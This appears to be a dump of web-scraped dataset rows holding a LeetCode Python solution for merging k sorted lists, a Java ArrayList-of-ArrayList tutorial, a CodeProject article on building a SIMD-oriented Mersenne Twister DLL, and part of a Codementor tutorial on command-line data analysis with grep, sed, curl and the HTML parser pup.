text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91
values | source stringclasses 1
value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
Solution
Merge k Sorted Lists
Use min heap of size k to merge: O(Nlog(k))
- Maintain a min heap of size k and add the heads of each list to the heap.
- Now pop the heap and add to result. Then add to heap the next node for the popped element.
from heapq import heappush, heappop class Solution(object): def add_to_heap(self, i, heap, lists): if lists[i]: temp, lists[i].next = lists[i].next, None heappush(heap, (lists[i].val, (i, lists[i]))) lists[i] = temp return def mergeKLists(self, lists): """ :type lists: List[ListNode] :rtype: ListNode """ N, heap, result = len(lists), [], ListNode(-1) curr = result for i in range(N): self.add_to_heap(i, heap, lists) while len(heap): x, (i, lnode) = heappop(heap) curr.next, curr = lnode, lnode # Statement makes sure old values are assigned. self.add_to_heap(i, heap, lists) return result.next | https://discuss.leetcode.com/topic/75082/python-solution-with-detailed-explanation | CC-MAIN-2017-51 | refinedweb | 146 | 75 |
How to create one ArrayList of ArrayList in Java :
In this quick Java programming tutorial, I will show you how to create one ArrayList of ArrayList, i.e. an ArrayList with ArrayList elements. The program will take all inputs from the user. It will take the ArrayList inputs and then print out the result.
Java program to create ArrayList of ArrayList :
import java.util.ArrayList; import java.util.Scanner; public class Example { public static void main(String[] args) { //1 ArrayList<ArrayList> myList = new ArrayList<>(); //2 int arrayListCount, itemCount; Scanner scanner = new Scanner(System.in); //3 System.out.println("Enter total number of ArrayList to add : "); arrayListCount = scanner.nextInt(); //4 System.out.println("Enter total values for each ArrayList : "); itemCount = scanner.nextInt(); //5 for (int i = 0; i < arrayListCount; i++) { //6 System.out.println("Enter all values for ArrayList " + (i + 1) + " : "); ArrayList list = new ArrayList<>(); //7 for (int j = 0; j < itemCount; j++) { //8 System.out.println("Enter value " + (j + 1) + " : "); list.add(scanner.next()); } //9 myList.add(list); } //10 System.out.println(myList); } } each ArrayList. We can also have ArrayList with different size. Create one Scanner variable scanner to read the user inputs.
- Ask the user to enter the total number of ArrayList to add. Read the value and store it in arrayListCount.
- Ask the user to enter the total elements for each ArrayList. Read it and store it in itemCount.
- Run one for loop to get inputs of all ArrayList.
- Ask the user to enter all values for the current ArrayList. Create one ArrayList variable list.
- Run one for-loop for itemCount time to get all values for the current ArrayList.
- Ask the user to enter the current value for the ArrayList. Read it and add it to the ArrayList.
- Add the ArrayList to the ArrayList of ArrayList.
- Finally, print out the ArrayList of ArrayList.
Sample Output :
Enter total number of ArrayList to add : 3 Enter total item numbers for each ArrayList : 2 Enter values for ArrayList 1 : Enter item 1 : a Enter item 2 : b Enter values for ArrayList 2 : Enter item 1 : c Enter item 2 : d Enter values for ArrayList 3 : Enter item 1 : e Enter item 2 : f [[a, b], [c, d], [e, f]]
You can also download the above example from here.
Similar tutorials :
- Java program to remove element from an ArrayList of a specific index
- Java program to move all zeros of an integer array to the start
- Java program to merge values of two integer arrays
- Java Program to convert an ArrayList to an Array
- How to remove elements of Java ArrayList using removeIf() method
- Java arraylist set method example | https://www.codevscolor.com/java-create-arraylist-of-arraylist | CC-MAIN-2020-50 | refinedweb | 438 | 58.99 |
Technical Writing-----------GRETL/SPSS/MATLAB/EVIEWS/MINITAB
Budget $30-250 USD
T he A ssignment
You will be allocated a country to analyse.
(a) Create a log return series from the stock price index (the log return is the change in the logarithm of the stock price). Estimate an appropriate pure AR(p) model and an appropriate pure MA(q) model and compare these to a mixed ARMA(1,1) model. Carefully explain how your models were selected.
(40 % )
(b) Using your preferred model from (a), test for the presence of any ARCH
effects in the residuals and estimate an appropriate GARCH model. (30 % )
(c) By selecting an appropriate model in the GARCH family, test for whether there is any evidence of:
(i) a link between risk (conditional volatility) and the log return (15 % )
(ii) an asymmetric response to positive and negative volatility shocks. (15 % )
2000words
4 freelance font une offre moyenne de $186 pour ce travail
Hello I am Julia. Please check PM | https://www.fr.freelancer.com/projects/technical-writing-academic-writing/technical-writing-gretl-spss-matlab/ | CC-MAIN-2018-30 | refinedweb | 164 | 51.89 |
As you know, lots of software developers need random numbers while they develop applications. Especially, financial and estimation based applications are commonly used areas of random numbers. Today, there are many random number generators, and some of them are open source and free to use. Both MT (Mersenne Twister) and its improved version SFMT (SIMD-oriented Fast Mersenne Twister) are very popular and well known random number generator algorithms.
The first part of the “SFMT in Action” series is about generating a SIMD-oriented Fast Mersenne Twister DLL. This DLL will be able to use the CPU’s capabilities, such as SSE2.
SSE2, Streaming SIMD Extensions 2, is one of the IA-32 SIMD (Single Instruction, Multiple Data) instruction sets. SSE2 was first introduced by Intel with the initial version of the Pentium 4 in 2001. It extends the earlier SSE instruction set, and is intended to fully supplant MMX. Intel extended SSE2 to create SSE3, in 2004. SSE2 added 144 new instructions to SSE, which has 70 instructions. Rival chip-maker AMD added support for SSE2 with the introduction of their Opteron and Athlon 64 ranges of AMD64 64-bit CPUs, in 2003.
When applications are designed to take advantages of SSE2 and run on machines that support SSE2, they're almost always faster than before. Today, many CPUs support the SSE2 instruction set. For detailed information about SSE2, please visit this link.
Before starting to generate the SFMT DLL, let’s talk about it.
SIMD-oriented Fast Mersenne Twister (SFMT) is a Linear Feedbacked Shift Register (LFSR) generator that generates a 128-bit pseudorandom integer at one step. It was introduced by Mutsuo Saito and Makoto Matsumoto (from Hiroshima University) in 2006. SFMT is designed with the recent parallelism of modern CPUs, such as multi-stage pipelining and SIMD (e.g., 128-bit integer) instructions. It supports 32-bit and 64-bit integers, as well as double precision floating point as output. SFMT is a variant of Mersenne Twister (MT), and is twice as faster. So, it’s nice to know that the SFMT DLL is available to generate both 32-bit and 64-bit integers.
You can find SFMT’s official site here.
A detailed explanation of the academic concept of the SFMT structure can be found here.
As I've said yet, in this article, I'll try to generate an SFMT DLL, and when I do this, I'll use the original version of SFMT codes. Its original C implementation (version 1.3.3) can be downloaded from here. During my development, some special and necessary changes on the original C implementation and reasons to modify the original code will be explained step by step. The base concept when generating SFMT.dll is not to change or modify its core codes, but make these codes callable and usable form outside of the generated DLL.
Note that I'll use Visual Studio 2008 on Windows Vista; both for analyzing the original code and developing the SFMT DLL.
In Visual Studio, I start a new C++ Win32 project named SFMT:
Now, the Win32 Application Wizard will be shown. In this window, from Application Settings, I choose “DLL” for Application type, and tick “Empty project” for Additional options.
After clicking the Finish button, a new empty project will be created on the Visual Studio screen.
I unzipped the original C implementation code of SFMT which I downloaded from this address under the Visual Studio 2008\Projects\SFMT directory. After unzipping, you see lots of files, but be sure we won't use all of them. Some of them are for test purposes, and some of the files include test results.
Actually, there are five main code files in the C implementation (version 1.3.3) that I focused on, and they are:
gen_rand32
include
#elif MEXP == 19937 #include "SFMT-params19937.h"
In the code, you'll see a definition called MEXP, and it’s the starting point to use the algorithm. MEXP means Mersenne Exponent. The period of the generated code will be 2MEXP-1. It’s a must be definition to use the algorithm. It must be one of these values: 607, 1279, 2281, 4253, 11213, 19937, 44497, 86243, 132049, 216091.
Unless you haven't specified it, the default value is 19937.
If you examine the original implementation of SFMT, you see that it can be compiled in three possible platforms:
Above, as you see, number 3 isn't applicable for Microsoft based platforms, because it uses AltiVec instructions. Number 2 (using the power of SSE2 instructions) is the way to go for me. While generating the DLL, my target is to modify the code to be compiled with the SSE2 instructions. Therefore, first of all, I'll clean some unnecessary parts of the code. Also, at the end of the development, when I build and compile the SFMT.dll, you'll switch easily between standard C and SSE2 supported versions.
In the Solution Explorer, under the SFMT project, I added the existing SFMT.c file to the Source Files directory and opened it to modify.
At the beginning, I detached some preprocessor codes in the SFMT.c file. For example, it includes some definitions and meanings like this:
BIG_ENDIAN64
The HAVE_ALTIVEC, BIG_ENDIAN64, or ONLY64 preprocessor commands and their related code aren't applicable or suitable for Windows platforms, and I removed these commands and their related code from the SFMT.c file carefully.
HAVE_ALTIVEC
ONLY64
On the other hand, there’s a preprocessor definition called HAVE_SSE2, and it’s a critical one for us. It’s important to keep HAVE_SSE2 and its related code in the file when removing other unnecessary definitions.
HAVE_SSE2
HAVE_SSE2
32-bit output
LITTLE ENDIAN 64-bit output
BIG ENDIAN 64-bit output
required
MEXP
MEXP, BIG_ENDIAN64
optional
HAVE_SSE2, HAVE_ALTIVEC
HAVE_ALTIVEC, ONLY64
In SFMT.c file, there are two functions that are used for filling arrays with 32 bit or 64 bit random integer numbers. First is fill_array32 and second is fill_array64. I changed some part of these functions and want to mention these changes here:
fill_array
fill_array32
fill_array64
The size of array must be greater than or equal to (MEXP / 128 + 1) * 4 for fill_array32 and must be greater than or equal to (MEXP / 128 + 1) * 2 for fill_array64.
Because of these rules, I had to use extended size arrays when generating pseudo random numbers. Also, it's very important and much flexible to have the ability using all the sizes for array. To fulfill the arrays, I coded new functions and added them to SFMT.c code file. These functions are listed below:
/**
* This function is used to determine extended size of specified array[]
* in the fill_array32 function.
* Because, array size must be greater than or equal to (MEXP / 128 + 1) * 4
* so, let's fulfill the array if the size smaller than (MEXP / 128 + 1) * 4
* Because, array size must be a multiple of 4.
* so, let's fulfill the array.
*/
int get_array32_extended_size(int size) {
int extended_size = 0;
int remainder = 0;
if (size < get_min_array_size32())
extended_size = get_min_array_size32();
else
extended_size = size;
remainder = extended_size % 4;
extended_size = extended_size + 4 - remainder;
return extended_size;
}
/**
* This function is used to determine extended size of specified array[]
* in the fill_array64 function.
* Because, array size must be greater than or equal to (MEXP / 128 + 1) * 2
* so, let's fulfill the array if the size smaller than (MEXP / 128 + 1) * 2
* Because, array size must be a multiple of 2.
* so, let's fulfill the array.
*/
int get_array64_extended_size(int size) {
int extended_size = 0;
int remainder = 0;
if (size < get_min_array_size64())
extended_size = get_min_array_size64();
else
extended_size = size;
remainder = extended_size % 2;
extended_size = extended_size + 2 - remainder;
return extended_size;
}
As I've mentioned in the previous paragraph, these modifications are very important. Via these modifications, we eliminated both the rule of array size must be multiple of 4 or multiple of 2 and the rule of array size must be greater than or equal to (MEXP / 128 + 1) * 4 or (MEXP / 128 + 1) * 2. To be more clear, for example, if you want to generate 2113 count integer number, you can do it easily by using modified fill_array32 or fill_array64 functions. By using the original version of fill_array32 and fill_array64 functions, you can't generate total 2113 count integer. Because 2113 isn't a multiple of 4 or multiple of 2.
Note: Body of modified fill_array32 and fill_array64 functions that integrated with get_array32_extended_size and get_array64_extended_size functions are mentioned below.
get_array32_extended_size
get_array64_extended_size
\b
In MSVC CRT, a dynamic array can be allocated using _aligned_malloc() function, and deallocated using _aligned_free(). Below, the code for aligned memory allocation that is used in the fill_array32 and fill_array64 is given.
_aligned_malloc()
_aligned_free()
int* ptr;
#if defined(HAVE_SSE2)
ptr = (w128_t *) _aligned_malloc(sizeof(uint32_t) * extended_size, 16);
#else
ptr = (w128_t *) _aligned_malloc(sizeof(uint32_t) *
extended_size, __alignof(uint32_t));
#endif
The modified fill_array32 and fill_array64 functions are listed below:
int fill_array32(uint32_t *array, int size) {
int* ptr;
int extended_size = get_array3232_t) * extended_size, 16);
#else
ptr = (w128_t *) _aligned_malloc(sizeof(uint32_t) *
extended_size, __alignof(uint32_t));
#endif
if (ptr == NULL)
return 0;
else {
gen_rand_array(ptr, extended_size / 4);
memcpy((w128_t *)array, ptr, sizeof(uint32_t) * size);
idx = N32;
_aligned_free(ptr);
}
return 1;
}
int fill_array64(uint64_t *array, int size) {
int* ptr;
int extended_size = get_array6464_t) * extended_size, 16);
#else
ptr = (w128_t *) _aligned_malloc(sizeof(uint64_t) *
extended_size, __alignof(uint64_t));
#endif
if (ptr == NULL)
return 0;
else {
gen_rand_array(ptr, extended_size / 2);
memcpy((w128_t *)array, ptr, sizeof(uint64_t) * size);
idx = N32;
_aligned_free(ptr);
}
return 1;
}
In this file, I removed only the #ifdef __GNUC__ preprocessor definition and its related code. Because I am using the Microsoft Visual Studio C++ compiler for generating a DLL, I don't need GNU based codes.
#ifdef __GNUC__
You can see some basic definitions in this file. Their structure and meanings are like this:
/*-----------------
BASIC DEFINITIONS
-----------------*/
/** Mersenne Exponent. The period of the sequence
* is a multiple of 2^MEXP-1.
* #define MEXP 19937 */
/** SFMT generator has an internal state array of 128-bit integers,
* and N is its size. */
#define N (MEXP / 128 + 1)
/** N32 is the size of internal state array when regarded as an array
* of 32-bit integers.*/
#define N32 (N * 4)
/** N64 is the size of internal state array when regarded as an array
* of 64-bit integers.*/
#define N64 (N * 2)
Also, some Mersenne Exponent dependent #include preprocessor commands were included. The code structure is listed below:
#include
#if MEXP == 607
#include "SFMT-params607.h"
#elif MEXP == 1279
#include "SFMT-params1279.h"
#elif MEXP == 2281
#include "SFMT-params2281.h"
#elif MEXP == 4253
#include "SFMT-params4253.h"
#elif MEXP == 11213
#include "SFMT-params11213.h"
#elif MEXP == 19937
#include "SFMT-params19937.h"
#elif MEXP == 44497
#include "SFMT-params44497.h"
#elif MEXP == 86243
#include "SFMT-params86243.h"
#elif MEXP == 132049
#include "SFMT-params132049.h"
#elif MEXP == 216091
#include "SFMT-params216091.h"
#else
#endif
The MEXP value is used as a criteria for determining and including correct parameter files to the project, and via this mechanism, developers can use their necessary parameter files by just changing the value of MEXP. Because of this mechanism, the original SFMT implementation covers ten different SFMT-paramsXXXXXX.h header files.
In my project, I used 19937 for MEXP. Also, 19937 is the default value for the original C implementation too.
After modifying the SFMT-params.h file, it’s time to make changes in the associated SFMT-paramsXXXXXX.h files. There are ten files and, each has its own descriptions. The MEXP constant can take ten different values and so, there are ten different paramsXXXXXX.h files at present. I use 19937 for MEXP and the first file to be changed is SFMT-params19937.h.
In the SFMT-params19937.h header file, there are some parameters for Altivec. They start with a #if defined (__APPLE__) structure in the code. I removed this preprocessor code block. This block contains parameters for the MAC OS X and is listed below:
#if defined (__APPLE__)
/* PARAMETERS FOR ALTIVEC */
#if defined(__APPLE__) /* For OSX */
#define ALTI_SL1 (vector unsigned int)(SL1, SL1, SL1, SL1)
#define ALTI_SR1 (vector unsigned int)(SR1, SR1, SR1, SR1)
#define ALTI_MSK (vector unsigned int)(MSK1, MSK2, MSK3, MSK4)
#define ALTI_MSK64 \
(vector unsigned int)(MSK2, MSK1, MSK4, MSK3)
#define ALTI_SL2_PERM \
(vector unsigned char)(1,2,3,23,5,6,7,0,9,10,11,4,13,14,15,8)
#define ALTI_SL2_PERM64 \
(vector unsigned char)(1,2,3,4,5,6,7,31,9,10,11,12,13,14,15,0)
#define ALTI_SR2_PERM \
(vector unsigned char)(7,0,1,2,11,4,5,6,15,8,9,10,17,12,13,14)
#define ALTI_SR2_PERM64 \
(vector unsigned char)(15,0,1,2,3,4,5,6,17,8,9,10,11,12,13,14)
#else /* For OTHER OSs(Linux?) */
#define ALTI_SL1 {SL1, SL1, SL1, SL1}
#define ALTI_SR1 {SR1, SR1, SR1, SR1}
#define ALTI_MSK {MSK1, MSK2, MSK3, MSK4}
#define ALTI_MSK64 {MSK2, MSK1, MSK4, MSK3}
#define ALTI_SL2_PERM {1,2,3,23,5,6,7,0,9,10,11,4,13,14,15,8}
#define ALTI_SL2_PERM64 {1,2,3,4,5,6,7,31,9,10,11,12,13,14,15,0}
#define ALTI_SR2_PERM {7,0,1,2,11,4,5,6,15,8,9,10,17,12,13,14}
#define ALTI_SR2_PERM64 {15,0,1,2,3,4,5,6,17,8,9,10,11,12,13,14}
#endif /* For OSX */
Other SFMT-paramsXXXXXX header files are: SFMT-params607.h, SFMT-params1279.h, SFMT-params2281.h, SFMT-params4253.h, SFMT-params11213.h, SFMT-params44497.h, SFMT-params86243.h, and SFMT-params216091.h.
I changed and modified all these parameter files. In other words, I clean out all the unnecessary OS X specific code in the header files.
Below, you can see other necessary parameters that are defined in the SFMT-params19937.h file:
#define POS1 122 // the pick up position of the array.
#define SL1 18 // the parameter of shift left as four 32-bit registers.
#define SL2 1 // the parameter of shift left as one 128-bit register.
#define SR1 11 // the parameter of shift right as four 32-bit registers.
#define SR2 1 // the parameter of shift right as one 128-bit register.
/* A bitmask, used in the recursion. These parameters are introduced
to break symmetry of SIMD. */
#define MSK1 0xdfffffefU
#define MSK2 0xddfecb7fU
#define MSK3 0xbffaffffU
#define MSK4 0xbffffff6U
// These definitions are part of a 128-bit period certification vector.
#define PARITY1 0x00000001U
#define PARITY2 0x00000000U
#define PARITY3 0x00000000U
#define PARITY4 0x13c9e684U
// String representation of MEXP 19937 parameters.
#define IDSTR "SFMT-19937:122-18-1-11-1:dfffffef-ddfecb7f-bffaffff-bffffff6"
The SFMT.h header file is very important. I'll add this file to my project. Of course, it’s a header (*.H) file so, I add it to the Header Files directory of my project. After making some modifications on it, I'll be able to call the SFMT functions outside of my DLL. Before talking about the changes, let’s look at the SFMT.h functions, declarations, their missions:
uint32_t gen_rand32(void)
uint64_t gen_rand64(void)
int fill_array32(uint32_t *array, int size)
int fill_array64(uint64_t *array, int size)
void init_gen_rand(uint32_t seed)
seed
To call these SFMT functions outside of my DLL, I need to use a special keyword:
__declspec(dllexport): You can export data, functions, classes, or class member functions from a DLL using the __declspec(dllexport) keyword. __declspec(dllexport) adds the export directive to the object file so you do not need to use a .def.
__declspec(dllexport)
NONAME
PRIVATE
To export SFMT functions, the __declspec(dllexport) keyword must appear to the left of the calling-convention keyword, if a keyword is specified. For example:
__declspec(dllexport) int fill_array32(uint32_t *array, int size):
__declspec(dllexport) stores function names in the DLL's export table.
To make our code more readable, I'll define a macro for __declspec(dllexport) at the beginning of the SFMT header file, and will use this macro with each function we are exporting:
#define DllExport __declspec( dllexport )
After these modifications, our SFMT functions become an exportable form. You can see them below:
DllExport uint32_t gen_rand32(void);
DllExport uint64_t gen_rand64(void);
DllExport int fill_array32(uint32_t *array, int size);
DllExport int fill_array64(uint64_t *array, int size);
DllExport void init_gen_rand(uint32_t seed);
Real versions of functions: In the SFMT.h file, you can see some real versions of functions. They're due to Isaku Wada, and are used to generate random real numbers. All of the real functions are inline functions. Inline functions cannot be compiled as part of a DLL. An inline function implies that it is compiled into the location that calls it. This implies that an inline function does not have an address since the function is duplicated wherever it is called (i.e., in the main app, for example). If you want to make it as a separate binary library (*.lib, *.dll, etc.), the exported function could not be inline - truly - they are located in the binary file, not in your executable code. Because of these reasons, I clean inline functions as part of the SFMT.h file, and then add the rSFMT.cpp file to my Project under the Source Files directory. This file includes real versions of functions but not inline versions. Then, I form them to be exported, as seen below:
//Exporting rSFMT.cpp functions:
DllExport double to_real1(uint32_t v);
DllExport double genrand_real1(void);
DllExport double to_real2(uint32_t v);
DllExport double genrand_real2(void);
DllExport double to_real3(uint32_t v);
DllExport double genrand_real3(void);
DllExport double to_res53(uint64_t v);
DllExport double to_res53_mix(uint32_t x, uint32_t y);
DllExport double genrand_res53(void) ;
DllExport double genrand_res53_mix(void);
Extern C: After these modifications, if you compile the SFMT DLL and call the exported functions, then you'll get an error message at runtime, like this:
This problem occurs because the C++ compiler decorates the function names to get function overloading. Let’s see the exact name of our functions using the powerful Windows utility dumpbin.exe. Our command is dumpbin -exports SFMT.dll. The result of this command prompt is shown below:
As you see in this command prompt, the function names aren't clear, and when we try to call them, an unhandled exception occurs always.
There isn't any standard way of decorating the function names. So, you have to tell the C++ compiler to not decorate function names. We'll use the extern C structure to not decorate our functions:
extern
At the beginning of the SFMT.h file:
#ifdef __cplusplus
extern "C" {
#endif
and at the end of the SFMT.h file:
#ifdef __cplusplus
}
#endif
Now, the code and functions we write between this extern C structure will work correctly and will be callable easily. At this time, let’s see the dumpbin -exports SFMT.dll command results:
If you look into the SFMT.c file, you'll see this code:
#if defined(HAVE_SSE2)
#include "SFMT-sse2.h"
#endif
This code means, if you include the HAVE_SSE2 definition in the command line of our project, then the project will use the SFMT-sse2.h file. Therefore, if you examine the SFMT-sse2.h file you'll realize that this file is coded for using the power of the CPU’s SSE2 special commands. Of course, using this file makes our code faster. The first and only limitation of using this file is running it only on SSE2 supported CPUs.
Using SSE2 support and how to enable this functionality is mentioned on the next caption “Setting project properties”.
In Visual Studio, under the Project menu, click “SFMT properties…”.
A new window with an “SFMT Property Pages” caption will be visible. In this window, on the left side, under the “Configuration Properties” tab, you can see some property categories (General, Debugging, C/C++ etc.) that we'll use.
First of all, on the upper side of the project properties window, click the “Configuration Manager” button, and the Configuration Manager will be displayed on the screen. In this window, set the Configuration parameter to Release. Also, set “Active solution configuration” to Release, too. Setting this parameter to Release means the compiling our project doesn't need debug data and it's ready to release.
The most important properties of our SFMT.dll project are Preprocessors.
Under the “Configuration Properties” --> C/C++ --> Preprocessor tab, there are preprocessor definitions. I'll add two definitions here: MEXP and HAVE_SSE2. MEXP has been mentioned before, and it represents the Mersenne Exponent. In addition, the HAVE_SSE2 definition is used for taking advantage of CPU’s SSE2 support.
MEXP
I want to say that changing the MEXP value or eliminating SSE2 support is very flexible in this situation. You can always configure these two preprocessor definitions and then compile another version of the SFMT.dll easily.
SSE2
Another important property is “Optimization” Under Configuration Properties --> C/C++ --> Optimization, please be sure Optimization is set to “Maximize Speed (/O2)”. Setting this property to Maximize Speed (/O2) means the compiler will produce some optimization output when we compile the project. This can increase the size of the SFMT.dll, but it can also be disregarded. Because, the speed of SFMT.dll is preferred to bigger size. It’s not necessary to have faster code when we're generating two or three random numbers, but when generating 10 million numbers, the speed of our code becomes a major factor. In time critical applications like mathematical operations or engineering applications, perhaps, a fast code might be more appropriate.
Also, we have to know another option called “Enable Intrinsic Functions (/Oi)” . Programs that use intrinsic functions are faster because they do not have the overhead of function calls, but may be larger because of the additional code created.
In Configuration Properties --> C/C++ --> Code Generation tab, the default value of the Runtime Library option is Multi-threaded DLL (/MD). I'll change this option to Multi-threaded (/MT). This causes your application to use the multithreaded, static version of the run-time library. It defines _MT, and causes the compiler to place the library name LIBCMT.lib into the .obj file so that the linker will use LIBCMT.lib to resolve external symbols.
_MT
C/C++ multi-threaded applications on Windows need to be compiled with either the -MT or -MD options. The -MT option will link using the static library LIBCMT.LIB, and -MD will link using the dynamic library MSVCRT.LIB. The binary linked with -MD will be smaller but dependent on MSVCRT.DLL, while the binary linked with -MT will be larger but will be self-contained with respect to the runtime. The actual working code is contained in MSVCR90.DLL (for Visual Studio 2008 projects), which must be available at runtime to applications linked with MSVCRT.lib.
If I build my project with the –MD option (dynamic linking), then my SFMT.dll will be approximately 10 KB. It’s a quite small one. If I build the project with the –MT option (static linking), then my SFMT.dll will be 57 KB. Of course, it’s larger than 10 KB.
On the other hand, If I try to call and use the dynamically linked SFMT.dll on the other computer, possibly, I can get an error like this:
"This application has failed to start because the application configuration is incorrect. Reinstalling the application may fix this problem"
This error shows that the computer and the Operating System which you are trying to run the SFMT.dll on don't have the C/C++ Runtime Libraries. In this situation, you must distribute The C/C++ Runtime Libraries with your SFMT.dll. You can see the analysis of the SFMT.dll running on an Operating System without the C/C++ Runtime Libraries below. As you can see, it needs the MSVCR90.dll and related libraries. Also note that, it’s quite simple to setup the SFMT Project with the necessary C/C++ Runtime Libraries. Because, we're using a powerful IDE: Visual Studio 2008.
In addition, in the Configuration Properties --> C/C++ --> Code Generation tab, set the Enable Enhanced Instruction Set property to Streaming SIMD Extensions 2 (/arch:SSE2). The arch flag enables the use of instructions found on processors that support enhanced instruction sets, e.g., the SSE and SSE2 extensions of Intel 32-bit processors. Note that, with this setting, it will prevent the code running on processors which don't support SSE2 extensions. But, in this project, our processor target is CPUs supporting SSE instructions.
After setting these properties under C/C++ tab, our Command Line is:
/O2 /Oi /GL /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_USRDLL"
/D "SFMT_EXPORTS" /D "MEXP=19937" /D "HAVE_SSE2" /D "_WINDLL" /D
"_UNICODE" /D "UNICODE" /FD /EHsc /MT /Gy /arch:SSE2
/Fo"Release\\" /Fd"Release\vc90.pdb" /W3 /nologo /c /Zi /TP /errorReport:prompt
On the other tab called “Linker”, it’s important to see the Target Machine property set to MachineX86. This is the default value for our project, but don't forget to check it. The Linker tab’s command will be like this:
/OUT:"C:\Users\emre\Documents\Visual Studio 2008\Projects\SFMT\Release\SFMT.dll"
/INCREMENTAL:NO /NOLOGO /DLL /MANIFEST
/MANIFESTFILE:"Release\SFMT.dll.intermediate.manifest"
/MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG
/PDB:"C:\Users\emre\Documents\Visual Studio 2008\Projects\SFMT\Release\SFMT.pdb"
/SUBSYSTEM:WINDOWS /OPT:REF /OPT:ICF /LTCG
Now, it is time to build the SFMT project. To do this, simply press the F6 key, or focus on the Build menu of Visual Studio and then click “Build Solution”. If all is OK, then you'll get a message “Build succeeded”. After this, Visual Studio will create a folder named “Release” under the SFMT project main directory. In this folder, you'll see SFMT.dll. To analyze SFMT.dll, I use the Dependency Walker tool. You can download it from here. All exportable functions in SFMT.dll can be seen easily via this GUI. You can see a screenshot representing the SFMT.dll below.
In addition, After building my project I renamed the SFMT.dll to SFMTsse2.dll for future compatibility. Actually, I'll need this kind of criterion when determining and using the right DLL. Anyway, we'll talk about it later.
If you don't have SSE2 support on the machine which SFMT.dll will run, then you'll get an error. Instead of getting this error, you could easily prepare C version of SFMT.dll and rename it to SFMTc.dll. This SFMTc.dll could generate random numbers without needing SSE2 support. It's too easy to configure project properties for SFMTc.dll:
That's it. You can use your SFMTc.dll on the machines that don't have SSE2 support.
New articles of the “SFMT in Action” series are coming soon.
See you later.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
<a href=""><strong> breaking news india</strong></a>
<a href=""><strong> breaking news today</strong></a>
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Articles/31436/SFMT-in-Action-Part-I-Generating-a-DLL-Including-S?PageFlow=FixedWidth | CC-MAIN-2016-18 | refinedweb | 4,506 | 56.35 |
An Intro to Data Science at the Command Line with Pup, Go, and CLI Tools
This command line programming tutorial will teach you how to use command line tools to analyze data, including how to parse html with tools like Pup. Additionally, you will learn how to build a simple CLI (Command Line Interface) with Go.
This tutorial is based an office hours session hosted by Codementor Eric Chiang, the creator of Pup. Pup was on the top of Hacker News when it debuted.
The text below is a summary done by the Codementor team and may vary from the original video and if you see any issues, please let us know!
Nifty Command Line Tools You Should Try
Grep & nl
$Cat is a command line tool that will takes a file and spits out the content of the file.
grep will take the file and filter the content out.
The most important thing is the pipe (
|), where we can take some command, take the output of the command, and put it into something else. So in this example we take the output of
$cat, put it into
grep using the command called pipe (
|), and filter for the word “pup”. The cool thing about
grep is you can have lots of pipes and chain the command together, like this:
nl basically takes every single line and puts the line number in front of it. In this case we have the
$cat command line,
cats_n_dogs.txt file, and in the middle we have the command line
nl. We usually use this command to prepend the line number, which can be useful for huge text files where you want to search for a specific word, and now you can know the exact line number where the word is located.
Analyzing Data with the Pipe Command
Say you have a txt file containing all of Shakespeare’s work. Here are several command lines that will help you analyze the file:
\ $ cat Shakespeare.txt | \ sed -e 's/\s+/\n/g' | \ tr -d ' ' | \ grep -e '^$' -v | \ tr '[:upper:]' '[:lower:]' | \ sort | uniq -c | sort -nr | \ head -n 50
in which you can find what were the most common words Shakespeare wrote with
\ sed -e 's/\s+/\n/g' | \
sed replaces certain characters with other characters. In this case, white spaces and new lines are replaced, and every single word will be put on a new line. Then, you can trim the result with
tr –d ‘ ‘ | \. Also, notice that the
grep here
grep -e '^$' -v | \
here is used in the opposite way of what it has been used for previously. Instead of filtering only for lines containing a certain word, here it will filter for any line that doesn’t use a particular keyword. In this example, we’re looking for any lines that don’t contain anything and filtering those out.
We can then convert every upper case letter to lower case with
tr '[:upper:]' '[:lower:]', sort and count them with
sort | uniq –c, sort them again and count them by numbers with
sort –nr, and finally get the first 50 lines of the result with
head -n 50
Curl & wget
wget has a tone of commands. For instance, it can take a link, downloads all its content, and save it to some file, like how I downloaded the text file containing all of Shakespeare’s works.
$ wget -O Shakespeare.txt \
One of my favorite
wget commands is
$ wget --load-cookies cookies.txt
Where I can load cookies, which signifies me as being a unique user to a website. (Eg. Facebook and twitter uses cookies to recognize users, and when I come back to those sites again it knows who I am based on my cookies.)
wget can take these cookies and pretend to be me on a website, which is interesting because it will allow you to download in an automated, dynamic way that would not have been possible without the cookies.
The unfortunate thing about
wget is that it’s not very pipe-like, so there’s another command called
curl if you’re like me and really like using pipes.
Curl
Curl can also download files like
wget:
$ curl -o Shakespeare.txt \
Additionally, it can function like the
$cat command.
$ curl... | \ sed -e 's/\s+/\n/g' | \ tr -d ' ' | \ grep -e '^$' -v | \ tr '[:upper:]' '[:lower:]' | \ sort | uniq -c | sort -nr | \ head -n 50
Therefore, instead of catting your files, you can use
curl on a url to achieve the same results.
However it’s not easy to interact with HTML due to how irregular it is, even though it’s possible.
What makes things worse, some horribly written HTML such as
<tbody> <tr><img src="foo"></tr> <tr><img/><br> </tbody> </table>
can be considered valid, but they cannot be parsed into XML, which just complicate things. All in all, my advice is to never try to write an HTML parser.
Instead, try using other tools like Python’s BeautifulSoup or Ruby’s Nokogiri. However, since both processes are kind of slow, I was looking for a better way to do this, and eventually stumbled upon a Go package html. It’s an awesome HTML parser someone has already written for you, and you can import it into your code.
However, I really want to be able to use it with pipes, which is where pup comes in.
What is Pup?
Pup is a command line tool for parsing html, and it was originally inspired by jq and Data Science at the Command Line’s idea of using command line tools to analyze data. It’s filled with tools that can take things like xml, json, and it can do interesting things with them very quickly, dynamically, and flexibly.
First we’ll use the command
$curl –s –L
which will spit out nasty html. But we can use pup to analyze it
$curl –s –L | pup title
So if you use the command
pup title, all it will do is grab the title
<title>Google</title>
You can even filter for css selectors like the
strong tag
$curl –s –L | pup strong | head –n
You can also filter for div ids to get a certain portion/element of a webpage like this:
$curl –s –L | pup div#about <div id="about"> Go is an open source programming language that makes it easy to build simple, reliable, and efficient software. </div>
However, in this example, pup is still spitting out html. It’s better than before, but still not optimal. So we can do a cool thing and spit out text instead with
